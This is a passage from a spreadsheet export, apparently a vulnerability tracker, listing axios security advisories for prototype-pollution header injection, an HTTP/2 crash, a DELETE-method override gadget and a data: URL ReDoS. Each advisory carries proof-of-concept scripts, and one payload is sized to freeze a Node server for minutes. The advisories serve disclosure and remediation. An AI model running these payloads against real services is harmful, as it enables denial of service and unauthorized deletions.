  if (platform.hasStandardBrowserEnv || platform.hasStandardBrowserWebWorkerEnv || utils.isReactNative(data)) {
    headers.setContentType(undefined);
  } else if (utils.isFunction(data.getHeaders)) {
    setFormDataHeaders(headers, data.getHeaders(), own('formDataHeaderPolicy'));
  }
}
```
Unlike `lib/adapters/http.js`, this code does not reject `Object.prototype.getHeaders`. Local verification on axios `1.18.1` polluted `Object.prototype[Symbol.toStringTag]`, `append`, and `getHeaders`, then sent an array body with `adapter: 'fetch'`. The loopback server received `X-Poisoned: yes`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype[Symbol.toStringTag] = 'FormData';
Object.prototype.append = function () {};
Object.prototype.getHeaders = () =&gt; ({ 'X-Poisoned': 'yes' });
await axios.post(url, ['a', 'b'], { adapter: 'fetch' });
```
Expected safe behavior is that inherited `Object.prototype.getHeaders` is ignored. Current affected behavior merges the returned header.
## Workarounds
Use the Node HTTP adapter for server-side requests that may run in a polluted process. Avoid passing array or class-instance bodies through the fetch adapter when prototype pollution is suspected.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
The Node HTTP adapter contains a guard that prevents `Object.prototype.getHeaders` from being used as a FormData header source. The shared `resolveConfig()` helper does not have the same guard. The fetch adapter calls `resolveConfig()`, so it can still merge headers returned by inherited `data.getHeaders()`.
This is a patch mismatch for the FormData prototype-pollution header-injection class.
## Affected Version
Validated on:
- axios: `1.17.0`
- commit: `4306df2`
- runtime: Node.js `v24.15.0`
## Preconditions
- Application uses `adapter: 'fetch'`.
- A separate prototype-pollution primitive can write:
  - `Object.prototype[Symbol.toStringTag] = 'FormData'`
  - `Object.prototype.append = function () {}`
  - `Object.prototype.getHeaders = function () { ... }`
- The request body is an array or custom class instance. Plain objects are blocked by the current `isFormData()` plain-object guard.
## Root Cause
`lib/adapters/http.js` contains:
```js
data.getHeaders !== Object.prototype.getHeaders
```
But `lib/helpers/resolveConfig.js` only checks:
```js
} else if (utils.isFunction(data.getHeaders)) {
  setFormDataHeaders(headers, data.getHeaders(), own('formDataHeaderPolicy'));
}
```
The fetch adapter calls `resolveConfig(config)` before dispatching the request.
## Impact
An attacker can inject arbitrary headers into fetch-adapter requests. This may be used to influence internal APIs, metadata services, cache behavior, or application-specific authorization checks.
## Proof of Concept
```js
import axios from './index.js';
import http from 'http';
const start = (handler) =&gt; new Promise((resolve) =&gt; {
  const server = http.createServer((req, res) =&gt; {
    let body = '';
    req.on('data', (chunk) =&gt; (body += chunk));
    req.on('end', () =&gt; handler(req, res, body));
  });
  server.listen(0, '127.0.0.1', () =&gt; resolve(server));
});
const stop = (server) =&gt; new Promise((resolve) =&gt; server.close(resolve));
const hits = [];
const tag = Symbol.toStringTag;
const server = await start((req, res, body) =&gt; {
  hits.push({ headers: req.headers, body });
  res.setHeader('Content-Type', 'application/json');
  res.end('{"ok":true}');
});
try {
  Object.prototype[tag] = 'FormData';
  Object.prototype.append = function () {};
  Object.prototype.getHeaders = () =&gt; {
    const headers = Object.create(null);
    headers['X-Poisoned'] = 'yes';
    return headers;
  };
  await axios.post(`http://127.0.0.1:${server.address().port}/fetch-formdata`, ['a', 'b'], {
    adapter: 'fetch',
    timeout: 3000
  });
  console.log(hits[0]);
} finally {
  delete Object.prototype[tag];
  delete Object.prototype.append;
  delete Object.prototype.getHeaders;
  await stop(server);
}
```
Observed wire request:
```json
{
  "headers": {
    "x-poisoned": "yes",
    "content-type": "text/plain;charset=UTF-8",
    "content-length": "3"
  },
  "body": "a,b"
}
```
## References
- https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9
- https://osv.dev/vulnerability/GHSA-6chq-wfr3-2hj9
- Related patch area: `lib/adapters/http.js`, `lib/helpers/resolveConfig.js`
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101900</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101901</t>
        </is>
      </c>
      <c r="D177" s="5" t="inlineStr"/>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M177" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr"/>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios versions with Node.js HTTP/2 support can terminate the caller’s process when a ClientHttp2Session emits an error event that is not handled by axios.
This affects applications that use the Node HTTP adapter with httpVersion: 2. A malicious, unavailable, or non-HTTP/2 endpoint can cause an uncaught exception instead of a normal rejected axios request.
## Impact
The impact is denial of service. In affected applications, an attacker who can influence the request destination, or operate the destination server, may be able to crash the Node.js process.
This does not affect default HTTP/1.1 usage, browser XHR/fetch adapters, or applications that do not enable axios HTTP/2 support.
## Affected Functionality
Affected path:
- Node.js HTTP adapter
- httpVersion: 2
- HTTP/2 session creation/reuse through Http2Sessions
- Network/session failures emitted as ClientHttp2Session error events
Caller-controlled http2Options can make the issue easier to trigger, but passing arbitrary attacker input into axios config is caller-controlled behavior and should not be the primary advisory framing.
## Technical Details
Http2Sessions.getSession() creates a session with http2.connect(authority, options) but only registers a close handler. It does not register an error handler on the returned ClientHttp2Session.
When the session emits error, Node treats it as an unhandled EventEmitter error and throws. This can bypass the normal axios Promise rejection path and terminate the process.
## Proof of Concept of Attack
```js
import axios from './index.js';
await axios.get('http://127.0.0.1:1/', {
  httpVersion: 2,
  timeout: 1000
});
```
Expected vulnerable behavior: the process exits with an uncaught ECONNREFUSED session error instead of only rejecting the axios request.
## Workarounds
Disable axios HTTP/2 for untrusted or user-influenced destinations and use the default HTTP/1.1 adapter until a fixed release is available. Also avoid passing attacker-controlled values into http2Options; axios config is trusted application input.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
Hi, i'm RelunSec a security researcher working with **InsiteTech.jp**
i want let you known, i finded a DoS in axios, to reproduce that, that is the example of a server
```js
const http = require('http');
// Import the local axios version to ensure the patch is active
const axios = require('../../lib/axios.js').default; 
const url = require('url');
// A public HTTP/2 server to make internal requests to.
// This simulates an external service your application might interact with over HTTP/2.
const TARGET_URL = 'https://nghttp2.org/'; 
const PORT = 3000;
const server = http.createServer(async (req, res) =&gt; {
  const parsedUrl = url.parse(req.url, true);
  const http2optionId = parsedUrl.query.http2optionId;
  if (!http2optionId) {
  console.warn(`[SERVER] Rejected request: Missing http2optionId parameter`);
  res.writeHead(400, { 'Content-Type': 'text/plain' });
  res.end('Error: Missing http2optionId query parameter. Usage: ?http2optionId=value\n');
  return; 
}
  console.log(`[SERVER] Received request with http2optionId: ${http2optionId}`);
  // Create an Axios instance configured for HTTP/2
  // The 'id' in http2Options makes each session configuration unique.
  const axiosInstance = axios.create({
    baseURL: TARGET_URL,
    httpVersion: 2,
    http2Options: {
      // rejectUnauthorized: false, // Uncomment if targeting a local HTTP/2 server with self-signed cert
      id: http2optionId, // This is the attacker-controlled unique part
    },
    // Adding a short timeout to prevent attacker from waiting too long if target is slow
    timeout: 5000 
  });
  try {
    const response = await axiosInstance.get('/');
    res.writeHead(200, { 'Content-Type': 'text/plain' });
    res.end(`Internal HTTP/2 request successful for ID: ${http2optionId}\nStatus: ${response.status}`);
  } catch (error) {
    // Check for the specific error indicating session limit reached
    if (error.isAxiosError &amp;&amp; error.code === axios.AxiosError.ERR_BAD_OPTION_VALUE) {
      console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
      res.writeHead(500, { 'Content-Type': 'text/plain' });
      res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
    } else {
      console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}:`, error.message);
      res.writeHead(500, { 'Content-Type': 'text/plain' });
      res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: Generic error - ${error.message}`);
    }
  }
});
server.listen(PORT, () =&gt; {
  console.log(`PoC Server listening on http://localhost:${PORT}`);
  console.log(`Targeting internal HTTP/2 requests to: ${TARGET_URL}`);
  console.log(`Send requests to http://localhost:${PORT}?http2optionId=...`);
  console.log(`Expected behavior with current patch: After ~100 unique http2optionIds, subsequent requests will receive ERR_BAD_OPTION_VALUE.`);
});
```
i tested all that in latest git version, after starting the server.cjs, to trigger that you just need do
```rust
relunsec@relunsec:~/software/axios-1/poc/poc$ curl http://127.0.0.1:3000/?http2optionId=hi
curl: (52) Empty reply from server
```
that is extremly simple to trigger
it confirms a DoS in the HTTP/2 session cache, that needs be patched, the impact is will lead the server crashes and shutdown by an attacker, the server is written properly and no flaws in it and try catch blocks and errors handled however because that is an axios internal error will crash
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101901</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101902</t>
        </is>
      </c>
      <c r="D178" s="5" t="inlineStr"/>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M178" s="5" t="inlineStr">
        <is>
          <t>0.34.0, 1.20.0</t>
        </is>
      </c>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr"/>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios default-instance requests that omit an explicit method can read an inherited `method` value from `Object.prototype`. If another vulnerability in the same process pollutes `Object.prototype.method`, calls such as `axios.request({ url })` and `axios({ url })` can send a state-changing HTTP method instead of the expected default `GET`.
Axios does not create the prototype pollution source. This is a read-side gadget in axios request dispatch.
## Impact
In an affected application with a separate prototype-pollution primitive, an attacker can change axios default-instance requests that omit `method` from `GET` to methods such as `DELETE`, `POST`, `PUT`, or `PATCH`. The practical impact depends on the target endpoint and can include unintended writes, deletion, or other state changes.
Method aliases such as `axios.get(url)` and requests with an explicit own `method` are not affected by the confirmed method path.
## Affected Functionality
Affected:
- Default axios instance calls: `axios.request({ url })`.
- Callable shorthand: `axios({ url })`.
- Requests where no own `config.method` is provided.
Not affected in the confirmed method PoC:
- `axios.get(url)` and other method aliases.
- `axios.request({ url, method: 'GET' })`.
- `axios.create().request({ url })` when the created instance defaults are produced by current `mergeConfig()` and do not inherit from `Object.prototype`.
## Technical Details
`lib/core/Axios.js` sets the request method with:
```js
config.method = (config.method || this.defaults.method || 'get').toLowerCase();
```
`mergeConfig()` now returns a null-prototype request config, so `config.method` is safe from `Object.prototype`. However, the default axios instance stores the module defaults object as `this.defaults`, and that defaults object is a normal object. If `Object.prototype.method` exists, `this.defaults.method` resolves to the polluted inherited value.
Local verification on axios `1.18.1` showed a default-instance `axios.request({ url })` request reaching a loopback server as `DELETE` after `Object.prototype.method = 'DELETE'`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.method = 'DELETE';
try {
  await axios.request({ url: 'http://127.0.0.1:&lt;port&gt;/resource' });
} finally {
  delete Object.prototype.method;
}
```
Expected safe behavior is a `GET` request. Current affected behavior sends `DELETE` on the default instance when no method is provided.
## Workarounds
Use explicit method aliases such as `axios.get()` or set an own `method` on request configs. Avoid default-instance shorthand for requests in processes where prototype pollution is suspected or possible.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
### Summary
Axios `1.17.0` contains a read-side prototype-pollution gadget in the default Axios instance. If another vulnerability in the same Node.js process pollutes `Object.prototype.method`, default-instance calls such as `axios.request({ url })` and `axios({ url })` can be forced to use an attacker-controlled HTTP method, such as `DELETE`, instead of the expected default `GET`.
Axios does not create the prototype pollution by itself. The issue is that Axios reads fallback values from `this.defaults` without an own-property guard, allowing inherited values from `Object.prototype` to influence request behavior.
This should be treated as a prototype-pollution gadget, not as a standalone prototype-pollution source. In other words, Axios is not the component that lets the attacker write to `Object.prototype`; Axios is the component that becomes dangerous after `Object.prototype` has already been polluted by another bug in the same process.
### Details
The vulnerable fallback read is in `lib/core/Axios.js`:
```js
// Set config.allowAbsoluteUrls
if (config.allowAbsoluteUrls !== undefined) {
  // do nothing
} else if (this.defaults.allowAbsoluteUrls !== undefined) {
  config.allowAbsoluteUrls = this.defaults.allowAbsoluteUrls;
} else {
  config.allowAbsoluteUrls = true;
}
// Set config.method
config.method = (config.method || this.defaults.method || 'get').toLowerCase();
```
The merged request `config` is created as a null-prototype object in `lib/core/mergeConfig.js`:
```js
const config = Object.create(null);
```
Therefore, when the caller does not provide `config.method`, the fallback becomes:
```js
this.defaults.method
```
The default Axios instance uses the module defaults object. In the tested version, that defaults object is affected by inherited properties from `Object.prototype`. If `Object.prototype.method` is polluted, `this.defaults.method` resolves to that inherited value and Axios uses it as the request method.
The same unsafe inherited-property pattern also affects `this.defaults.allowAbsoluteUrls`, which can change how absolute URLs are combined with `baseURL`.
### Proof of Concept
#### Access and Attack Conditions
No admin access is required for Axios itself. This is a library-level gadget.
The attacker must have an existing way to pollute `Object.prototype` in the same Node.js process, for example through a separate prototype-pollution vulnerability in another dependency or application input path. Axios is the gadget that turns that pollution into dangerous HTTP request behavior.
Required condition:
```text
Some other bug or unsafe merge path in the application must allow Object.prototype pollution.
```
What Axios contributes:
```text
Axios reads inherited Object.prototype.method through this.defaults.method and uses it as the HTTP method fallback.
```
What Axios does not do:
```text
Axios does not create Object.prototype pollution by itself.
```
Affected usage:
```js
axios.request({ url });
axios({ url });
```
Not affected in the confirmed PoC:
```js
axios.get(url);
axios.request({ url, method: "GET" });
axios.create().request({ url });
```
#### Reproduction Steps
1. Create a clean test directory and install Axios `1.17.0`:
```powershell
mkdir axios-validation
cd axios-validation
npm init -y
npm install axios@1.17.0 --no-audit --no-fund
```
2. Save the method override PoC below as:
```text
validate-prototype-method-gadget.mjs
```
3. Run the PoC:
```powershell
node validate-prototype-method-gadget.mjs
```
4. Confirm that the output shows:
```text
defaultRequestMethod=DELETE
defaultShorthandMethod=DELETE
getAliasMethod=GET
explicitGetMethod=GET
createdInstanceMethod=GET
RESULT: CONFIRMED
```
5. This proves that after `Object.prototype.method = "DELETE"`, default-instance calls that omit an explicit method are sent as `DELETE`.
#### What the Method PoC Script Does
The PoC starts a temporary local HTTP server for each Axios call and records the HTTP method received by that server. It then simulates an already-existing prototype-pollution condition by setting:
```js
Object.prototype.method = "DELETE";
```
While that pollution is active, the script sends five Axios requests:
```js
axios.request({ url });                 // expected vulnerable path
axios({ url });                         // expected vulnerable shorthand path
axios.get(url);                         // expected safe alias path
axios.request({ url, method: "GET" });  // expected safe explicit-method path
axios.create().request({ url });        // expected safe isolated-instance path
```
The script then deletes the polluted property:
```js
delete Object.prototype.method;
```
Finally, it prints the method observed by the local server for each request. The vulnerable behavior is confirmed when the default Axios instance sends `DELETE` for `axios.request({ url })` and `axios({ url })`, while the safe comparison paths still send `GET`.
#### Method Override PoC
Create `validate-prototype-method-gadget.mjs`:
```js
import http from "node:http";
import axios from "axios";
async function listen(server) {
  await new Promise((resolve) =&gt; server.listen(0, "127.0.0.1", resolve));
  return server.address().port;
}
async function runRequest(label, requestFn) {
  const hits = [];
  const server = http.createServer((req, res) =&gt; {
    hits.push({
      method: req.method,
      url: req.url,
    });
    res.writeHead(200, { "content-type": "application/json" });
    res.end(JSON.stringify({ ok: true }));
  });
  const port = await listen(server);
  const url = `http://127.0.0.1:${port}/${label}`;
  let status = "completed";
  let error = "";
  try {
    await requestFn(url);
  } catch (err) {
    status = "error";
    error = err?.message || String(err);
  }
  server.close();
  return { label, status, error, hits };
}
const results = [];
Object.prototype.method = "DELETE";
try {
  results.push(await runRequest("default-request-no-method", (url) =&gt; axios.request({ url })));
  results.push(await runRequest("default-shorthand-no-method", (url) =&gt; axios({ url })));
  results.push(await runRequest("default-get-alias", (url) =&gt; axios.get(url)));
  results.push(await runRequest("default-request-explicit-get", (url) =&gt; axios.request({ url, method: "GET" })));
  const instance = axios.create();
  results.push(await runRequest("created-instance-request-no-method", (url) =&gt; instance.request({ url })));
} finally {
  delete Object.prototype.method;
}
const defaultRequestMethod = results.find((r) =&gt; r.label === "default-request-no-method")?.hits[0]?.method || "";
const defaultShorthandMethod = results.find((r) =&gt; r.label === "default-shorthand-no-method")?.hits[0]?.method || "";
const getAliasMethod = results.find((r) =&gt; r.label === "default-get-alias")?.hits[0]?.method || "";
const explicitGetMethod = results.find((r) =&gt; r.label === "default-request-explicit-get")?.hits[0]?.method || "";
const createdInstanceMethod = results.find((r) =&gt; r.label === "created-instance-request-no-method")?.hits[0]?.method || "";
console.log(`axiosVersion=${axios.VERSION}`);
console.log(`results=${JSON.stringify(results)}`);
console.log(`defaultRequestMethod=${defaultRequestMethod}`);
console.log(`defaultShorthandMethod=${defaultShorthandMethod}`);
console.log(`getAliasMethod=${getAliasMethod}`);
console.log(`explicitGetMethod=${explicitGetMethod}`);
console.log(`createdInstanceMethod=${createdInstanceMethod}`);
const confirmed =
  defaultRequestMethod === "DELETE" &amp;&amp;
  defaultShorthandMethod === "DELETE" &amp;&amp;
  getAliasMethod === "GET" &amp;&amp;
  explicitGetMethod === "GET" &amp;&amp;
  createdInstanceMethod === "GET";
console.log(confirmed ? "RESULT: CONFIRMED" : "RESULT: NOT CONFIRMED");
process.exitCode = confirmed ? 0 : 1;
```
Run:
```powershell
node validate-prototype-method-gadget.mjs
```
Observed result:
```text
axiosVersion=1.17.0
defaultRequestMethod=DELETE
defaultShorthandMethod=DELETE
getAliasMethod=GET
explicitGetMethod=GET
createdInstanceMethod=GET
RESULT: CONFIRMED
```
The local server received:
```text
axios.request({ url })              -&gt; DELETE
axios({ url })                      -&gt; DELETE
axios.get(url)                      -&gt; GET
axios.request({ url, method:"GET" }) -&gt; GET
axios.create().request({ url })     -&gt; GET
```
This confirms that inherited `Object.prototype.method` controls the default method for vulnerable default-instance request paths.
#### Supporting `allowAbsoluteUrls` Gadget Evidence
The same inherited-property issue affects `allowAbsoluteUrls`.
Create `validate-prototype-allowabsoluteurls-gadget.mjs`:
```js
import http from "node:http";
import axios from "axios";
async function listen(server) {
  await new Promise((resolve) =&gt; server.listen(0, "127.0.0.1", resolve));
  return server.address().port;
}
async function runCase(label, requestFn) {
  const baseHits = [];
  const absoluteHits = [];
  const baseServer = http.createServer((req, res) =&gt; {
    baseHits.push({ method: req.method, url: req.url, host: req.headers.host || "" });
    res.end("base");
  });
  const absoluteServer = http.createServer((req, res) =&gt; {
    absoluteHits.push({ method: req.method, url: req.url, host: req.headers.host || "" });
    res.end("absolute");
  });
  const basePort = await listen(baseServer);
  const absolutePort = await listen(absoluteServer);
  try {
    await requestFn({
      baseURL: `http://127.0.0.1:${basePort}/api`,
      url: `http://127.0.0.1:${absolutePort}/absolute-path`,
    });
  } catch {}
  baseServer.close();
  absoluteServer.close();
  return { label, baseHits, absoluteHits };
}
const results = [];
results.push(await runCase("baseline-no-pollution", (config) =&gt; axios.request(config)));
Object.prototype.allowAbsoluteUrls = false;
try {
  results.push(await runCase("polluted-default-request", (config) =&gt; axios.request(config)));
  const instance = axios.create();
  results.push(await runCase("polluted-created-instance", (config) =&gt; instance.request(config)));
} finally {
  delete Object.prototype.allowAbsoluteUrls;
}
console.log(`axiosVersion=${axios.VERSION}`);
console.log(`results=${JSON.stringify(results)}`);
```
Observed result:
```text
axiosVersion=1.17.0
baselineUsedAbsolute=true
pollutedDefaultUsedBase=true
pollutedInstanceUsedAbsolute=true
RESULT: CONFIRMED
```
Without pollution, Axios sends the request to the absolute URL. After `Object.prototype.allowAbsoluteUrls = false`, the default Axios instance combines the absolute URL with `baseURL` and sends the request to the base server instead. An instance created with `axios.create()` remains unaffected.
### Impact
This is a prototype-pollution gadget. It becomes exploitable when an application has any separate prototype-pollution primitive that allows an attacker to set properties on `Object.prototype` in the same Node.js process.
If such pollution is possible, an attacker can influence Axios default-instance requests that omit an explicit method:
- `axios.request({ url })`
- `axios({ url })`
This can turn an expected safe default `GET` request into a state-changing method such as:
- `DELETE`
- `POST`
- `PUT`
- `PATCH`
Potential impact includes unauthorized state-changing requests, deletion of resources, unintended writes, data corruption, or denial of service when the target endpoint treats the HTTP method as security-relevant.
The issue does not require admin access to Axios itself, but it does require an existing prototype-pollution path in the application. Applications that always use explicit methods, method aliases such as `axios.get()`, or isolated instances created through `axios.create()` are not affected by the confirmed method-override path.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101902</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101903</t>
        </is>
      </c>
      <c r="D179" s="5" t="inlineStr"/>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M179" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr"/>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios for Node.js parses `data:` URLs in `lib/helpers/fromDataURI.js`. The current RFC-2397 parser uses a regular expression whose media type groups allow `/` inside both sides of the `type/subtype` match. A malformed `data:` URL containing many slashes and no comma forces the JavaScript regex engine to try many possible placements for the separator before failing.
Applications are affected when they pass untrusted URL strings to axios and do not reject or constrain `data:` URLs before axios parses them.
## Impact
An attacker can make the Node.js event loop spend significant synchronous CPU time parsing a single malformed URL. In a server that accepts a URL from an HTTP request and calls `axios.get(url)`, this can block unrelated requests and health checks until parsing completes.
The issue is availability-only. It does not disclose data or modify requests.
## Affected Functionality
Affected:
- Node.js HTTP adapter data URL handling.
- `axios.get()` or equivalent calls where `config.url` has the `data:` protocol.
Not affected:
- Browser fetch/XHR URL handling.
- Node requests where the application rejects `data:` URLs before calling axios.
- Older checked `0.x` data URL parser shape unless separately proven vulnerable.
## Technical Details
`lib/helpers/fromDataURI.js` contains:
```js
const DATA_URL_PATTERN = /^([^,;]+\/[^,;]+)?((?:;[^,;=]+=[^,;]+)*)(;base64)?,([\s\S]*)$/;
```
The `[^,;]+` groups include `/`, so a long string of slashes without a comma can be partitioned around the required `\/` in many ways before the match fails. The match runs before axios can apply request timeout behavior, so `timeout` does not mitigate the parsing pause.
Local timing on axios `1.18.1` with small payloads showed about 2.4 ms at 1000 slashes, 16.6 ms at 3000 slashes, and 71.5 ms at 6000 slashes, consistent with the submitted quadratic scaling while avoiding long-running payloads.
## Proof of Concept of Attack
Constrained helper-level demonstration:
```js
import axios from 'axios';
await axios.get('data:' + '/'.repeat(6000));
```
The request fails after parsing, but the failure is delayed by synchronous regex work. Larger payloads increase the pause substantially.
## Workarounds
Reject `data:` URLs before passing untrusted input to axios, or enforce a strict maximum URL length for URL-fetching endpoints. Applications that do not need `data:` URL support should deny that protocol explicitly.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
# ReDoS in `fromDataURI` data: URL parser freezes the event loop (DoS)
## Affected
- Package: `axios` (Node.js http adapter)
- Versions: 1.x (regex present on `v1.x`, current release line)
- File: `lib/helpers/fromDataURI.js`
- CWE-1333 (Inefficient Regular Expression Complexity)
## Issue
`fromDataURI` parses `data:` URLs with this regex:
```js
// lib/helpers/fromDataURI.js:9
const DATA_URL_PATTERN = /^([^,;]+\/[^,;]+)?((?:;[^,;=]+=[^,;]+)*)(;base64)?,([\s\S]*)$/;
```
The mediatype tokens `[^,;]+` include `/`, so they can span multiple slashes ambiguously. A `data:` URL made of many slashes with no comma forces the engine to try every way to place the single `\/` divider before failing — quadratic O(n²) backtracking. It runs synchronously on the main thread, so the whole Node event loop is frozen for the entire parse. Reachable through the public API on the Node http adapter (`axios.get(url)`); the browser fetch/xhr adapters are not affected because they do not call `fromDataURI`.
A configured `timeout` does not help: the freeze happens during parsing, before any network timer can fire.
## PoC (minimal)
```js
import axios from 'axios';
// ~256 KB data: URL of pure slashes, no comma
await axios.get('data:' + '/'.repeat(262139)); // blocks the event loop ~6 min, then throws
```
## Lab results
Single-threaded "fetch a user-supplied URL" service (link-preview style) calling `axios.get` on a JSON body `{ "url": "..." }`, with `timeout: 1000` set.
Scaling is clean O(n²) (constant k ≈ 5.6e-6 ms/byte², stable across sizes):
| data: URL size | Event-loop freeze (one request) |
| --- | --- |
| 32 KB | 6.3 s (measured end-to-end; server logged `event loop BLOCKED for 6.30s`) |
| 64 KB | ~24 s |
| 128 KB | ~96 s |
| 256 KB | ~385 s (~6.4 min) |
| 1 MB | ~100 min |
During the freeze the server answers nothing: a `/healthz` liveness probe times out for the whole window, and the server's own event-loop monitor cannot even log until the parse finishes. In a run through an intercepting proxy, the proxy hit its 120 s upstream timeout and gave up, while the origin stayed pegged at 100% CPU on one core past that — client/proxy timeouts do not mitigate it.
The attacker controls only the URL string and needs no auth. ~256 KB every ~6 min (≈ 0.7 bytes/sec) keeps a server permanently unavailable.
## Impact
Unauthenticated remote denial of service. One small request takes a Node service fully offline for minutes; a trickle keeps it down indefinitely.
CVSS 3.1: 7.5 (High) — `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`.
## Fix
RFC 2045 type/subtype tokens never contain `/`. Excluding `/` from those two character classes removes the ambiguity and the backtracking:
```js
const DATA_URL_PATTERN = /^([^,;/]+\/[^,;/]+)?((?:;[^,;=]+=[^,;]+)*)(;base64)?,([\s\S]*)$/;
```
Worst-case parse drops from ~2600 ms to ~0.002 ms. All valid `data:` URLs, including slashes in the body, parse identically.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101903</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101904</t>
        </is>
      </c>
      <c r="D180" s="5" t="inlineStr"/>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
